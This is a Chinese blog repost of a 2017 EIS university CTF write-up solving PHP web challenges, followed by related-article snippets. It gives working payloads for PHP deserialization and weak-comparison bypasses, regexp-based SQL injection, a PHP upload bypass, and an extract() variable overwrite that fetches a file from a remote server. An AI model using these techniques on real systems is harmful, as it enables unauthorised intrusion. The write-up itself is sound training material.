2017EIS高校运维大赛ctf wirteup

最新推荐文章于 2024-04-27 23:04:34 发布
最新推荐文章于 2024-04-27 23:04:34 发布
阅读量407 收藏
点赞数
文章标签: php 运维
原文链接:http://www.cnblogs.com/wangshuwin/p/7774495.html
版权

php代码审计

题目很简单GET传入参数args然后eval(var_dump($$args))直接传入全局变量GLOBALS就能执行
1063328-20171102215224326-382479713.png

php是最好的语言

.bak泄露拿到源码

<?php
$v1=0;$v2=0;$v3=0;
$a=(array)unserialize(@$_GET['foo']);
print_r($a);
if(is_array($a)){
    is_numeric(@$a["param1"])?exit:NULL;
    if(@$a["param1"]){
        ($a["param1"]>2017)?$v1=1:NULL;
    }
    if(is_array(@$a["param2"])){
        if(count($a["param2"])!==5 OR !is_array($a["param2"][0])) exit;
        $pos = array_search("nudt", $a["param2"]);
        $pos===false?die("nope"):NULL;
        foreach($a["param2"] as $key=>$val){
            $val==="nudt"?die("nope"):NULL;
        }
        $v2=1;
    }
}
$c=@$_GET['egg'];
$d=@$_GET['fish'];
if(@$c[1]){
    if(!strcmp($c[1],$d) && $c[1]!==$d){
        eregi("M|n|s",$d.$c[0])?err():NULL; 
        strpos(($c[0].$d), "MyAns")?$v3=1:NULL;
    }
}
if($v1 && $v2 && $v3){
    include "flag.php";
    echo $flag;
}

?>

最主要的几个考点,第一个序列化然后数组第一个参数大于2017就可以了。第二个,首先数组要5个参数然后数组首位必须要也是数组。array_search他匹配的时候,php进行弱比较如果是一个整形和一个其他类型比较会强制intval,然后intval(‘nudt’)=0传入0就行了,就是数组任何一位匹配到nudt都可以过。后面的array和string用strcmp比较的时候会返回null,eregi可以用用%00截断
Payload:?foo=a:2:{s:6:"param1";s:5:"2018e";s:6:"param2";a:5:{i:0;a:1:{i:0;i:1;}i:1;i:0;i:2;i:2;i:3;i:3;i:4;i:4;}}&egg[0]=%00MyAns&egg[1][]=1111&fish=1

1063328-20171102215240232-1604330319.png

Login

注入题直接写payload:uname=adn'or(pwd)regexp'^a&pwd=admin后面自带单引号闭合,然后一位一位的爆最后密码:fsaoaigafsdfsdubbwouibiaewrawe
1063328-20171102215327076-2066317555.png

文件上传

ext=php&content[]=<?php phpinfo();?>被坑了很久以为是xss。

随机数

以后记住了这种题不一样要计算的,直接爆破

php trick

右键查看源码,html注释中是index.php的源码

<!--
    index.php
    <?php
        $flag='xxx';
        extract($_GET);
        if(isset($gift)){
         $content=trim(file_get_contents($flag));
         if($gift==$content){
         echo'flag'; }
         else{
         echo'flag被加密了 再加密一次就得到flag了';}
         }
        ?>
        -->

extract()造成变量覆盖,get传入即可给gift变量赋值,绕过验证,在远程vps上构造文件1.txt,内容123,url赋值给flag,file_get_contents()函数支持http协议,就会去读取我们指定的vps上的文件,修改gift值为123,即可得到flag

转载于:https://www.cnblogs.com/wangshuwin/p/7774495.html

aihuochou9723
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2017 EIS 高校运维赛-RE-ReverseMe
WocW的博客
04-17 415
分析 打开题目尝试打开然后报错 以为是很麻烦的一件事,然后搜索这个报错,好像是QT框架相关的编译问题。MinGw有关。但是神奇的是可以在OD里动态调试。 先看IDA静态分析。 外面的逻辑很简单,输入一个长度大于19小于30的字符串,即可进入check部分。跟进查看 这样看懂,这题基本就解出来了。因为可以看出,参与异或的字符与我们的输入无关,所以直接使用动态调式将每次参与异或的值记录下来即可。...
2017年高校网络信息安全管理运维挑战赛部分题解
至臻求学,胸怀云月
11-03 3124
Login右键源代码提示 用户名是admin 密码是pwd字段 典型注入 试一下 发现全都过滤了,空格union select还有各种函数… 使用异或^构造payload: (在我自己搭的环境里测试)发现可以 写脚本:import requests url = 'http://202.112.26.124:8080/fb69d7b4467e33c71b0153e62f7e2bf0/in
2017EIS CTFwriteup
weixin_30697239的博客
11-19 357
EIS2017也就是2017年高校网络信息安全管理 运维挑战赛,全国一百多所高校参赛,侥幸拿了个地区三等奖,事先不知道理论赛占分比,不然就会是二等奖(吐槽),生活没有如果,下次努力吧。 比赛已经结束大概两周了,直到前几天奖杯到了才想起来写下吧,结果拖延到今天。写下来方便以后查看。 总体来说比赛题目不是太难,刚开始的题目都被各位表哥都给秒了。下面就看一下吧。 一、签到题 一个二维码,直...
CTF —— 杂项 ——2017EIS隐藏在黑夜里的秘密
wengyihao的博客
05-10 278
2017EIS隐藏在黑夜里的秘密 下载附件,解压压缩包 得到flag.txt与 Treeinblack.bmp 1、查看 flag.txt文件,内容为: 2、打开图片很正常。 3、没看出问题,点击查看提示: 需要使用Stegsolve打开Treeinblack.bmp 然后在在Red plane 3中看到flag 4、得到答案为: EIS{Can_U_SEE_I_in_Darkness}。 总结: 不看提示的话没能够看出问题所在,通过提示才能够看出如何做题目。 ...
bugku ctf 一段base64 wirteup
热门推荐
成长之路
07-07 1万+
一段base64 一、安利一个工具Converter,网盘链接:http://pan.baidu.com/s/1eRBfv7G,这个题需要用! 二、题目内容:flag格式:flag{xxxxxxxxxxxxx},加上一个附件 三、打开附件 将base64编码复制粘贴到Converter这个软件里面 把参数复制输出到输入 fla
eis.rar_eis_eis group 如何?
09-24
Discuz!模板 适用版本: Discuz! X2 语言编码: GBK简体 风格转换者: 原创 ...离开的人怀念这里的热干面,精武鸭,还有这里的人和事,Eis_010城市空间Discuz!X2.0模板发布,想想你怀念的是哪座城市呢?
EIS电路拟合AZSimDemo
06-07
EIS电路拟合AZSimDemo,非常好用,
EIS电化学阻抗谱基本原理与识图方法
03-26
讲述了电化学阻抗谱的基本原理,以及如何根据EIS阻抗谱图识别电化学系统参数
ESET EIS 64位安装包
01-07
ESET EIS 64位版本离线安装包,安装包下载于2019-1-7日,需要准备序列号
电化学阻抗谱(EIS)测量系统设计
01-20
电路功能与优势 图 1 所示的电路是电化学阻抗 谱(EIS)测量 系统,用于表征锂离子(Li-Ion)和其他类型的电池 。EIS 是一种用于检测电化学系统内部发生的过程的安全扰动技术。该系统测量电池在一定频率范围内的...
BugkuCTF 域名解析
weixin_33953249的博客
05-05 159
前言 写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ 题目意思是把flag.bugku.com 解析到120.24.86.145,这个Windows和Linux下都行吧 windows下修改的文件为: c:\windows\s...
参加运维赛和领航杯的自闭历程
m0_45118974的博客
11-24 425
周三周四是高校运维赛,周三下午的理论题靠自己吧安全知识不够,靠度娘吧搜不到……佛了。周四一整天的ctf, 首先是Misc3,给了一串&zwnj和&#8203,就想着怎么给它解码吧,说是html编码,python脚本解码,解出来啥也没有,百度发现这俩东西一个是&zwnj(零宽不连字) 说明:&zwnj是一个不打印字符,放在电子文本的两个字符之间,抑制本来会发生的连字,...
对于CTF的见解
m0_73239569的博客
10-13 2321
起源: CTF全称为Capture The Flag(夺旗赛)它起源于1996 年DEFCON全球黑客大会,是网络安全爱好者之间的竞技游戏。通过不断的发展,它已经成为全球范围网络安全圈流行的竞赛形式,而 DEFCON 作为 CTF 赛制的发源地, DEFCON CTF 也成为了目前全球最高技术水平和影响力的 CTF 竞赛,类似于 CTF 赛场中的“世界杯”。 从2002年开始,DEFCOM CTF由专业团队搭设比赛平台、命题采用自动化评分。2013年全球巨变了五十多场国
1 linux网络诊断命令工具_linux诊断网络故障命令(1)
最新发布
2401_83974173的博客
04-27 405
12、DNS和NS查找工具14、Batfish15、Fiddler17、nload实时监控网络带宽CPU 方面内存IO 设备(磁盘、网络)网络工具mtr更多介绍 : https://mp.weixin.qq.com/s/-lru6FAhkXTo7gLCCfWlyg。
[CTF] BUUCTF系统加固题 → Ezsql
ZXW_NUDT的博客
12-09 5676
小声说:这可能是全网唯一一个Writeup 接下来讲讲具体咋做 第一步:肯定是用KALI上ssh登一下 然后找到index.php这个文件 接着查看文件里面的内容,最好是复制到VSCode上改完再粘贴回去 index.php文件内容如下: <!DOCTYPE html> <html lang="zh"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible"
2019高校运维赛writeup
蚁景网安学院
11-29 1930
MISC0x01 misc1导出数据观察可以发现最小值为0x2,最大值为0xF9,根据判断可见字符在这个范围内的应该为EBCDIC编码,且是CP1146(IBM EBCDIC英国编码) ...
CTF模式
haoshangguan的博客
10-12 1470
CTF竞赛模式具体分为以下几类: 正文 理论知识 理论题多见于国内比赛,通常为选择题。包含单选及多选,选手需要根据自己所学的相关理论知识进行作答。最终得出分数。理论部分通常多见于初赛或是初赛之前的海选 Jeopardy-解题 参赛队伍可以通过互联网或者现场网络参与,参数队伍通过与在线环境交互或文件离线分析,解决网络安全技术挑战获取相应分值,类似于 ACM 编程竞赛、信息学奥林匹克赛,根据总分和时间来进行排名。 不同的是这个解题模式一般会设置 一血(First Blood) 、 二血(Second Blood
ISCC2017 自相矛盾(代码审计)
烟敛寒林的博客
04-25 935
<?php $v1 = 0; $v2 = 0; $v3 = 0; $a = (array)json_decode(@$_GET['iscc']); if (is_array($a)) { is_numeric(@$a["bar1"]) ? die("nope") : NULL; if (@$a["bar1"]) { ($a["bar1"] > 2...
安恒杯EIS2017 writeup
Aurora的博客
11-07 6120
上星期参加了安恒杯EIS2017,记录一下。 Misc   签到题   扫二维码可得     隐藏在黑夜里的秘密   下载压缩包,打开时提示加密,猜测可能是伪加密,于是用 010editor 把加密位去掉,置为 0。然后解压压缩包,发现里面有个 flag,怀着激动的心情打开一看,结果是这样的:   夜已降临之时, 我将自己裹在深邃的黑暗中, 在夜的最深处 期待
eis spectrum analyzer
11-29
EIS谱分析仪是一种用于分析电化学阻抗谱的仪器。EIS代表电化学阻抗谱,它测量电化学系统中的电流和电压响应,以了解系统的电化学特性和界面的行为。 EIS谱分析仪是通过施加幅度和频率变化的正弦交流电信号来进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值